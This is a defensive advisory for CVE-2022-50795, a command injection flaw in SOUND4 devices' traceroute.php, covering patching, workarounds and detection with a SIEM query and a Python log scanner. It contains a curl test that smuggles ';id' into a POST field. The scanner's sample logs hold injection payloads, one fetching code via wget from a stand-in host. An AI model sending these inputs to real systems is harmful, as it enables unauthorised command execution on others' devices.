CVE-2022-50795
📋 TL;DR
CVE-2022-50795 is a conditional command injection vulnerability in SOUND4 IMPACT/FIRST/PULSE/Eco systems up to version 2.x. Unauthenticated attackers can execute arbitrary commands via a single HTTP POST request to traceroute.php, which creates and executes malicious files in /tmp. This affects all users running vulnerable versions of these SOUND4 products.
💻 Affected Systems
- SOUND4 IMPACT
- SOUND4 FIRST
- SOUND4 PULSE
- SOUND4 Eco
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise allowing remote code execution, data theft, lateral movement, and persistent backdoor installation.
Likely Case
Unauthenticated attackers gaining shell access, installing malware, or using the system as a pivot point for further attacks.
If Mitigated
Limited impact if proper network segmentation, web application firewalls, and file integrity monitoring are in place.
🎯 Exploit Status
Public exploit code exists on Packet Storm Security. The single HTTP POST requirement makes exploitation trivial.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Versions after 2.x
Vendor Advisory: https://www.sound4.com/
Restart Required: Yes
Instructions:
1. Contact SOUND4 for patched firmware.
2. Back up the device configuration.
3. Upload and install the patched firmware.
4. Restart the device.
5. Verify that traceroute.php is no longer vulnerable.
🔧 Temporary Workarounds
Remove traceroute.php
Delete or rename the vulnerable traceroute.php script to prevent exploitation.
rm /path/to/webroot/traceroute.php
mv /path/to/webroot/traceroute.php /path/to/webroot/traceroute.php.disabled
Web Application Firewall Rule
Block POST requests to traceroute.php using a WAF or reverse proxy.
# Example nginx config: location ~ traceroute\.php$ { deny all; }
# Example Apache config: <Files "traceroute.php"> Require all denied </Files>
🧯 If You Can't Patch
- Isolate affected systems in a dedicated VLAN with strict firewall rules blocking all unnecessary inbound/outbound traffic.
- Implement network-based intrusion detection to alert on exploitation attempts targeting traceroute.php.
🔍 How to Verify
Check if Vulnerable:
Check if traceroute.php exists in webroot and test with curl: curl -X POST http://target/traceroute.php --data 'test=;id'
Check Version:
Check device web interface or contact SOUND4 support for version information.
Verify Fix Applied:
Verify that traceroute.php now returns 404/403, or re-run the same curl command and confirm that no command output is returned.
📡 Detection & Monitoring
Log Indicators:
- HTTP POST requests to traceroute.php
- Unusual process execution from web server user
- Files created in /tmp directory by web server
Network Indicators:
- HTTP POST to traceroute.php with shell metacharacters in payload
- Outbound connections from device to unexpected destinations
SIEM Query:
source="web_logs" AND uri="/traceroute.php" AND method="POST" AND (payload CONTAINS ";" OR payload CONTAINS "|" OR payload CONTAINS "`")
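The SIEM query above expressed as a small log scanner, as an added example that is not part of the original advisory. It assumes access-log lines in combined format with the POST body appended in a `body="..."` field by a hypothetical logging setup; the sample lines are constructed, and the metacharacter set goes slightly beyond the page's `;`, `|` and backtick to also cover `$`, `&` and embedded newlines.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not from a real device). The body="..." field is
# an assumed addition to the standard combined log format.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2022:10:01:02 +0000] "POST /traceroute.php HTTP/1.1" 200 512 body="target=8.8.8.8"',
    '203.0.113.9 - - [10/Dec/2022:10:01:07 +0000] "POST /traceroute.php HTTP/1.1" 200 512 body="target=8.8.8.8%3Bid"',
    '198.51.100.7 - - [10/Dec/2022:10:02:11 +0000] "GET /index.php HTTP/1.1" 200 1024 body=""',
    '198.51.100.8 - - [10/Dec/2022:10:03:30 +0000] "POST /traceroute.php HTTP/1.1" 200 512 body="target=1.1.1.1%7Cwget+http://example.test/x"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) body="(?P<body>[^"]*)"$'
)

# Shell metacharacters that should never appear in a legitimate traceroute target.
SHELL_META = re.compile(r'[;|`$&\n]')


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # URL-decode the body first so that %3B (";") and %7C ("|") are not missed.
    rec["body"] = unquote_plus(rec["body"])
    return rec


def is_suspicious(rec):
    """True for a POST to traceroute.php whose decoded body carries a shell metacharacter."""
    path = rec["uri"].split("?", 1)[0]
    return (rec["method"] == "POST"
            and path.endswith("/traceroute.php")
            and SHELL_META.search(rec["body"]) is not None)


def find_alerts(lines):
    """Return (ip, timestamp, decoded_body) for every suspicious line."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_suspicious(rec):
            alerts.append((rec["ip"], rec["ts"], rec["body"]))
    return alerts


if __name__ == "__main__":
    for ip, ts, body in find_alerts(SAMPLE_LOGS):
        print(f"ALERT {ts} {ip} POST to traceroute.php with shell metacharacter: {body!r}")
```

On the constructed sample, the benign traceroute to 8.8.8.8 passes while the two URL-encoded injection attempts are flagged.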
🔗 References
- https://exchange.xforce.ibmcloud.com/vulnerabilities/247950
- https://packetstormsecurity.com/files/170267/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-traceroute.php-Conditional-Command-Injection.html
- https://www.sound4.com/
- https://www.vulncheck.com/advisories/sound-impactfirstpulseeco-x-conditional-command-injection-via-traceroutephp
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5740.php